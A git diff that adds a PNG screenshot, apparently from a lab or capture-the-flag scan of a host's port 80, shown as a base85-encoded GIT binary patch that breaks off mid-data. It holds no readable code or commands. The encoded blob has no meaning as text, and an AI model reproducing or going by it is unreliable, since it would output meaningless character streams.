b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png new file mode 100644 index 0000000000000000000000000000000000000000..6a3a2fd8f5b178f3dbce6de6114adff369185834 GIT binary patch literal 2097031 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 